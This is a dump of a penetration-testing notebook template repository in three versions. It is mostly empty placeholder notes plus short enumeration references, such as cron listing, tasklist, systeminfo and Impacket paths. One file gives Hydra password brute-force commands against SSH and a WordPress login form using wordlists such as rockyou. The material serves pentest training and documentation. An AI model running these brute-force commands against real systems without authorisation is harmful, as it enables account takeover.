Directory structure:

├── TJ-Pentest-Template-1.0.jex
├── TJ-Pentest-Template-2.0.jex
├── TJ-Pentest-Template-3.0.jex
├── Markdown_Versions
│   ├── Pentest_Template_Master_1.0
│   │   ├── Pentest Template Master 1.0
│   │   │   ├── 3. Exploitation
│   │   │   │   ├── Target _1
│   │   │   │   │   └── Notes.md
│   │   │   │   ├── Bypass Windows Amsi.md
│   │   │   │   ├── Netcat Tips.md
│   │   │   │   ├── Bypassing AV.md
│   │   │   │   ├── 1. General Notes.md
│   │   │   │   └── Msfvenom.md
│   │   │   ├── 4. Post Exploitation
│   │   │   │   ├── Network
│   │   │   │   │   └── Target _1.md
│   │   │   │   ├── Running Processes
│   │   │   │   │   └── Target _1.md
│   │   │   │   ├── Users and Groups
│   │   │   │   │   └── Target _1.md
│   │   │   │   ├── Installed Applications
│   │   │   │   │   └── Target _1.md
│   │   │   │   ├── Scheduled Jobs_Tasks
│   │   │   │   │   ├── Target _1.md
│   │   │   │   │   └── General Notes_.md
│   │   │   │   ├── System Exploitation
│   │   │   │   │   └── Target _1.md
│   │   │   │   ├── File System Information
│   │   │   │   │   └── Target _1.md
│   │   │   │   ├── BloodHound.md
│   │   │   │   ├── Impacket.md
│   │   │   │   ├── 2. C2 Frameworks.md
│   │   │   │   ├── Rubeus.md
│   │   │   │   ├── Mimikatz.md
│   │   │   │   └── 1. General Notes.md
│   │   │   ├── 2. Enumeration
│   │   │   │   ├── Services
│   │   │   │   │   ├── 1. Web
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   ├── SQL Injection.md
│   │   │   │   │   │   └── General Notes.md
│   │   │   │   │   ├── 2. SMB
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   └── General Notes.md
│   │   │   │   │   ├── 4. SNMP
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   └── General Notes.md
│   │   │   │   │   ├── 6. UDP
│   │   │   │   │   │   └── Target _1.md
│   │   │   │   │   ├── 7. Other
│   │   │   │   │   │   └── Target _1.md
│   │   │   │   │   ├── 3. Active Directory (AD)
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   └── General Notes.md
│   │   │   │   │   └── 5. TCP
│   │   │   │   │       └── Target _1.md
│   │   │   │   ├── General Notes.md
│   │   │   │   ├── Impacket General Notes.md
│   │   │   │   ├── Responder.md
│   │   │   │   └── Impacket Kerberoasting.md
│   │   │   ├── 1. Recon
│   │   │   │   ├── Target _1.md
│   │   │   │   └── General Notes.md
│   │   │   ├── 5. High Value Information
│   │   │   │   ├── Proof_Screenshots
│   │   │   │   │   └── Target _1.md
│   │   │   │   ├── Hashes
│   │   │   │   │   ├── 1. Identifying Hash Types.md
│   │   │   │   │   ├── 2. Cracking Hashes Online
│   │   │   │   │   │   ├── Hydra.md
│   │   │   │   │   │   └── Medusa.md
│   │   │   │   │   ├── 1. Cracking Hashes Offline
│   │   │   │   │   │   ├── Wordlists.md
│   │   │   │   │   │   ├── John The Ripper.md
│   │   │   │   │   │   ├── Cracking WEP_WPA_WPA 2 PSK Authetication.md
│   │   │   │   │   │   └── Hashcat.md
│   │   │   │   │   └── 2. Dumping Hashes.md
│   │   │   │   └── Passwords
│   │   │   │       └── General Notes.md
│   │   │   ├── General Information.md
│   │   │   ├── 6. Reporting
│   │   │   │   └── Tips for Writing a Report.md
│   │   │   └── Pivoting_Tunneling.md
│   │   └── _resources
│   │       ├── 310x310.png
│   │       └── d2550626a1c94aeebd273d43be0669c9.png
│   ├── Pentest_Template_Master_2.0
│   │   ├── Pentest Template Master 2.0
│   │   │   ├── 3. Exploitation
│   │   │   │   ├── Target _1
│   │   │   │   │   └── Notes.md
│   │   │   │   ├── Bypass Windows Amsi.md
│   │   │   │   ├── Netcat Tips.md
│   │   │   │   ├── Searchsploit.md
│   │   │   │   ├── Bypassing AV.md
│   │   │   │   └── Msfvenom.md
│   │   │   ├── 2. Enumeration
│   │   │   │   ├── Services
│   │   │   │   │   ├── 1. Web
│   │   │   │   │   │   ├── Changelog.txt
│   │   │   │   │   │   │   └── Changelog.txt Notes.md
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   └── SQL Injection.md
│   │   │   │   │   ├── 2. SMB
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   └── General Notes.md
│   │   │   │   │   ├── 4. SNMP
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   └── General Notes.md
│   │   │   │   │   ├── 7. UDP
│   │   │   │   │   │   └── Target _1.md
│   │   │   │   │   ├── 8. Other
│   │   │   │   │   │   └── Target _1.md
│   │   │   │   │   ├── 3. Active Directory (AD)
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   └── General Notes.md
│   │   │   │   │   ├── 6. TCP
│   │   │   │   │   │   └── Target _1.md
│   │   │   │   │   └── 5. FTP
│   │   │   │   │       └── General Notes.md
│   │   │   │   ├── Impacket General Notes.md
│   │   │   │   ├── General Notes.md
│   │   │   │   ├── Responder.md
│   │   │   │   └── Impacket Kerberoasting.md
│   │   │   ├── 4. Post Exploitation
│   │   │   │   ├── Target _1 (Default Template)
│   │   │   │   │   ├── System Information
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   ├── General Notes Windows.md
│   │   │   │   │   │   └── General Notes Linux.md
│   │   │   │   │   ├── Network
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   ├── General Notes Linux.md
│   │   │   │   │   │   └── General Notes Windows.md
│   │   │   │   │   ├── Running Processes
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   ├── General Notes Windows.md
│   │   │   │   │   │   └── General Notes Linux.md
│   │   │   │   │   ├── Users and Groups
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   ├── General Notes Linux_.md
│   │   │   │   │   │   └── General Notes Windows.md
│   │   │   │   │   ├── Files on the System
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   ├── General Notes Windows.md
│   │   │   │   │   │   └── General Notes Linux.md
│   │   │   │   │   ├── Installed Applications
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   ├── General Notes Linux.md
│   │   │   │   │   │   └── General Notes Windows.md
│   │   │   │   │   ├── Scheduled Jobs_Tasks
│   │   │   │   │   │   ├── Target _1.md
│   │   │   │   │   │   ├── General Notes Linux.md
│   │   │   │   │   │   └── General Notes Windows.md
│   │   │   │   │   ├── System Exploitation
│   │   │   │   │   │   └── Target _1.md
│   │   │   │   │   └── 1. Output from Privesc Scripts
│   │   │   │   │       └── Output from [Linux_Windows Priv Esc Script].md
│   │   │   │   ├── BloodHound.md
│   │   │   │   ├── Impacket.md
│   │   │   │   ├── Rubeus.md
│   │   │   │   ├── 2. C2 Frameworks.md
│   │   │   │   ├── Transferring Files.md
│   │   │   │   ├── Mimikatz.md
│   │   │   │   └── 1. General Notes.md
│   │   │   ├── 1. Recon
│   │   │   │   ├── Target _1.md
│   │   │   │   └── General Notes.md
│   │   │   ├── 5. High Value Information
│   │   │   │   ├── Proof_Screenshots
│   │   │   │   │   └── Target _1.md
│   │   │   │   ├── Hashes
│   │   │   │   │   ├── 1. Identifying Hash Types.md
│   │   │   │   │   ├── 2. Cracking Hashes Online
│   │   │   │   │   │   ├── Hydra.md
│   │   │   │   │   │   └── Medusa.md
│   │   │   │   │   ├── 1. Cracking Hashes Offline
│   │   │   │   │   │   ├── Wordlists.md
│   │   │   │   │   │   ├── John The Ripper.md
│   │   │   │   │   │   ├── Cracking WEP_WPA_WPA 2 PSK Authetication.md
│   │   │   │   │   │   └── Hashcat.md
│   │   │   │   │   └── 2. Dumping Hashes.md
│   │   │   │   └── Passwords
│   │   │   │       └── General Notes.md
│   │   │   ├── 6. Reporting
│   │   │   │   └── Tips for Writing a Report.md
│   │   │   ├── General Information.md
│   │   │   └── Pivoting_Tunneling.md
│   │   └── _resources
│   │       ├── 310x310.png
│   │       └── d2550626a1c94aeebd273d43be0669c9.png
│   └── Pentest_Template_Master_3.0
│       ├── _resources
│       │   ├── 310x310.png
│       │   └── d2550626a1c94aeebd273d43be0669c9.png
│       └── Pentest Template Master 3.0
│           ├── 2. Recon Targets
│           │   └── Target _1.md
│           ├── 9. High Value Information_Reporting
│           │   ├── Proof_Screenshots
│           │   │   └── Target _1.md
│           │   ├── Hashes
│           │   │   ├── 1. Identifying Hash Types.md
│           │   │   ├── 2. Cracking Hashes Online
│           │   │   │   ├── Hydra.md
│           │   │   │   └── Medusa.md
│           │   │   ├── 1. Cracking Hashes Offline
│           │   │   │   ├── Wordlists.md
│           │   │   │   ├── John The Ripper.md
│           │   │   │   ├── Cracking WEP_WPA_WPA 2 PSK Authetication.md
│           │   │   │   └── Hashcat.md
│           │   │   └── 2. Dumping Hashes.md
│           │   ├── Passwords
│           │   │   └── General Notes.md
│           │   └── Reporting
│           │       └── Tips for Writing a Report.md
│           ├── 4. Enumerating Targets
│           │   └── Target _1.md
│           ├── 6. Exploitation Targets_
│           │   └── Target _1.md
│           ├── 8. Post Exploitation Targets
│           │   └── Target _1.md
│           ├── 7. Post Exploitation
│           │   ├── Scheduled Jobs_Tasks
│           │   │   ├── General Notes Linux.md
│           │   │   └── General Notes Windows.md
│           │   ├── Running Processes
│           │   │   ├── General Notes Windows.md
│           │   │   └── General Notes Linux.md
│           │   ├── System Information
│           │   │   ├── General Notes Windows.md
│           │   │   └── General Notes Linux.md
│           │   ├── Users and Groups
│           │   │   ├── General Notes Windows.md
│           │   │   └── General Notes Linux_.md
│           │   ├── Kerberos Ticket Creation.md
│           │   ├── Installed Applications
│           │   │   ├── General Notes Linux.md
│           │   │   └── General Notes Windows.md
│           │   ├── Network
│           │   │   ├── General Notes Linux.md
│           │   │   └── General Notes Windows.md
│           │   ├── Rubeus.md
│           │   ├── Editable Services
│           │   │   └── General Notes.md
│           │   ├── Mimikatz.md
│           │   ├── BloodHound.md
│           │   ├── General Notes.md
│           │   └── Files on the System
│           │       ├── General Notes Windows.md
│           │       └── General Notes Linux.md
│           ├── 3. Enumeration Notes
│           │   ├── Impacket General Notes.md
│           │   ├── General Notes.md
│           │   ├── Services
│           │   │   ├── 04. Web (HTTP_HTTPS)
│           │   │   │   ├── SQL Injection.md
│           │   │   │   ├── Directory Fuzzing.md
│           │   │   │   └── Enumerating Web Services.md
│           │   │   ├── 3. Active Directory (AD)
│           │   │   │   └── General Notes.md
│           │   │   ├── 02. SSH
│           │   │   │   └── Enumerating SSH.md
│           │   │   ├── 01. FTP
│           │   │   │   └── Enumerating FTP.md
│           │   │   ├── 4. SNMP
│           │   │   │   └── General Notes.md
│           │   │   ├── 03. Email Services
│           │   │   │   └── Enumerating Email Services.md
│           │   │   ├── 05. Network Shares (SMB, SAMBA, NFS)
│           │   │   │   └── SMB Enumeration.md
│           │   │   └── 8. Other Services
│           │   │       └── LDAP Enumeration (Port 389).md
│           │   ├── Impacket Kerberoasting.md
│           │   ├── Impacket NtlmRelayX.md
│           │   ├── Pretender.md
│           │   └── Responder.md
│           ├── 1. Recon Notes
│           │   ├── General Notes.md
│           │   ├── Discovery Scans
│           │   │   ├── Domain_Sub Domain Discovery.md
│           │   │   ├── DNS_Hostname Discovery.md
│           │   │   └── Network Discovery Scans.md
│           │   ├── Host Scans
│           │   │   ├── Other Scanners.md
│           │   │   ├── Masscan.md
│           │   │   └── Nmap.md
│           │   └── Pivoting_Tunneling.md
│           ├── 5. Exploitation Notes
│           │   ├── Bypass Windows Amsi.md
│           │   ├── Netcat Tips.md
│           │   ├── Villian Cheatsheet.md
│           │   ├── Searchsploit.md
│           │   ├── Transferring Files.md
│           │   ├── Bypassing AV.md
│           │   └── Msfvenom.md
│           └── General Information.md
└── README.md

/TJ-Pentest-Template-1.0.jex:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/TJ-Pentest-Template-1.0.jex
--------------------------------------------------------------------------------

/TJ-Pentest-Template-2.0.jex:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/TJ-Pentest-Template-2.0.jex
--------------------------------------------------------------------------------

/TJ-Pentest-Template-3.0.jex:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/TJ-Pentest-Template-3.0.jex
--------------------------------------------------------------------------------
/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Target _1/Notes.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Target _1/Notes.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Changelog.txt/Changelog.txt Notes.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Information/Target _1.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Network/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/2. SMB/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/4. SNMP/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/6. UDP/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/7. Other/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. Web/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/2. SMB/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/4. SNMP/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/7. UDP/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/8. Other/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/1. Recon/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Running Processes/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Users and Groups/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/_resources/310x310.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_1.0/_resources/310x310.png
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/1. Recon/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/_resources/310x310.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_2.0/_resources/310x310.png
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/_resources/310x310.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_3.0/_resources/310x310.png
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Installed Applications/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/System Exploitation/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/File System Information/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Proof_Screenshots/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your targets here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/3. Active Directory (AD)/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Proof_Screenshots/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your targets here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/2. Recon Targets/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Network/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Proof_Screenshots/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your targets here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/5. TCP/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/6. TCP/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/4. Enumerating Targets/Target _1.md:
--------------------------------------------------------------------------------
# This is a placeholder to contain all notes regarding the enumeration phase for each target you assess.
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/6. Exploitation Targets_/Target _1.md:
--------------------------------------------------------------------------------
# This is a placeholder to contain all notes regarding the exploitation phase for each target you assess.
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Files on the System/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/System Exploitation/Target _1.md:
--------------------------------------------------------------------------------
# Fill in results or other information about your target here:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/8. Post Exploitation Targets/Target _1.md:
--------------------------------------------------------------------------------
# This is a placeholder to contain all notes regarding the post-exploitation phase for each target you assess.
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/_resources/d2550626a1c94aeebd273d43be0669c9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_1.0/_resources/d2550626a1c94aeebd273d43be0669c9.png
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/_resources/d2550626a1c94aeebd273d43be0669c9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_2.0/_resources/d2550626a1c94aeebd273d43be0669c9.png
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/_resources/d2550626a1c94aeebd273d43be0669c9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tjnull/TJ-JPT/HEAD/Markdown_Versions/Pentest_Template_Master_3.0/_resources/d2550626a1c94aeebd273d43be0669c9.png
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Identifying Hash Types.md:
--------------------------------------------------------------------------------
In Kali:

- hash-identifier

Online:

- Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/1. Identifying Hash Types.md:
--------------------------------------------------------------------------------
In Kali:

- hash-identifier

Online:

- Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Passwords/General Notes.md:
--------------------------------------------------------------------------------
# Any passwords or hashes that you find should be documented here. Include steps on how you were able to obtain them from your target:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Passwords/General Notes.md:
--------------------------------------------------------------------------------
# Any passwords or hashes that you find should be documented here. Include steps on how you were able to obtain them from your target:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/General Notes.md:
--------------------------------------------------------------------------------
# When in Doubt...Always Enumerate! Enumeration is the key!

## Resources
- http://www.0daysecurity.com/penetration-testing/enumeration.html
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Identifying Hash Types.md:
--------------------------------------------------------------------------------
In Kali:

- hash-identifier

Online:

- Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Passwords/General Notes.md:
--------------------------------------------------------------------------------
# Any passwords or hashes that you find should be documented here. Include steps on how you were able to obtain them from your target:
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Linux.md:
--------------------------------------------------------------------------------
# Linux:

- cat /etc/crontab
- cat /etc/anacrontab
- cat /etc/frontal
- cat /etc/anacron
- systemctl list-timers --all
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Linux.md:
--------------------------------------------------------------------------------
# Linux:

- cat /etc/crontab
- cat /etc/anacrontab
- cat /etc/frontal
- cat /etc/anacron
- systemctl list-timers --all
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Impacket General Notes.md:
--------------------------------------------------------------------------------
## In Kali

apt install impacket-scripts

## Github

https://github.com/fortra/impacket

## Local Locations:

/usr/share/doc/python3-impacket/examples
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Impacket General Notes.md:
--------------------------------------------------------------------------------
## In Kali

apt install impacket-scripts

## Github

https://github.com/SecureAuthCorp/impacket

## Local Locations:

/usr/share/doc/python3-impacket/examples
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Impacket General Notes.md:
--------------------------------------------------------------------------------
## In Kali

apt install impacket-scripts

## Github

https://github.com/SecureAuthCorp/impacket

## Local Locations:

/usr/share/doc/python3-impacket/examples
--------------------------------------------------------------------------------

/Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/1. Output from Privesc Scripts/Output from [Linux_Windows Priv Esc Script].md:
--------------------------------------------------------------------------------
# This is a note placeholder for the output you received from a priv esc script that you executed on the target you obtained access to.
-------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/General Information.md: -------------------------------------------------------------------------------- 1 | Created by TJ Null: 2 | 3 | Twitter: https://twitter.com/TJ_Null 4 | Github: https://github.com/tjnull 5 | 6 | Contribution: 7 | 8 | If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here: 9 | - https://github.com/tjnull/TJ-JPT -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/General Notes.md: -------------------------------------------------------------------------------- 1 | # When in Doubt...Always Enumerate! Enumeration is the key! 2 | 3 | 4 | 5 | ## Resources 6 | - http://www.0daysecurity.com/penetration-testing/enumeration.html 7 | - Backup Link: https://web.archive.org/web/20201122081447/http://www.0daysecurity.com/penetration-testing/enumeration.html -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Check for Processes 2 | 3 | - tasklist 4 | - wmic process list full 5 | 6 | # In PowerShell 7 | - Get-Process 8 | - Get-Process -Name 'Notepad' 9 | 10 | List path where the process is running: 11 | - (Get-Process -Name 'Calculator').Path 12 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. 
Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Check for Processes 2 | 3 | - tasklist 4 | - wmic process list full 5 | 6 | # In PowerShell 7 | - Get-Process 8 | - Get-Process -Name 'Notepad' 9 | 10 | List path where the process is running: 11 | - (Get-Process -Name 'Calculator').Path 12 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Command Line: 2 | 3 | - systeminfo 4 | 5 | # PowerShell 6 | 7 | - Get-ComputerInfo 8 | - Get-ComputerInfo -Property "*version" 9 | - Get-ComputerInfo -Property "*version", "os*" | select WindowsCurrentVersion, WindowsVersion, OsName, OsBuildNumber, OsHotFixes, OsArchitecture | fl -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Hydra.md: -------------------------------------------------------------------------------- 1 | - hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22 2 | 3 | - hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22 4 | 5 | - hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. 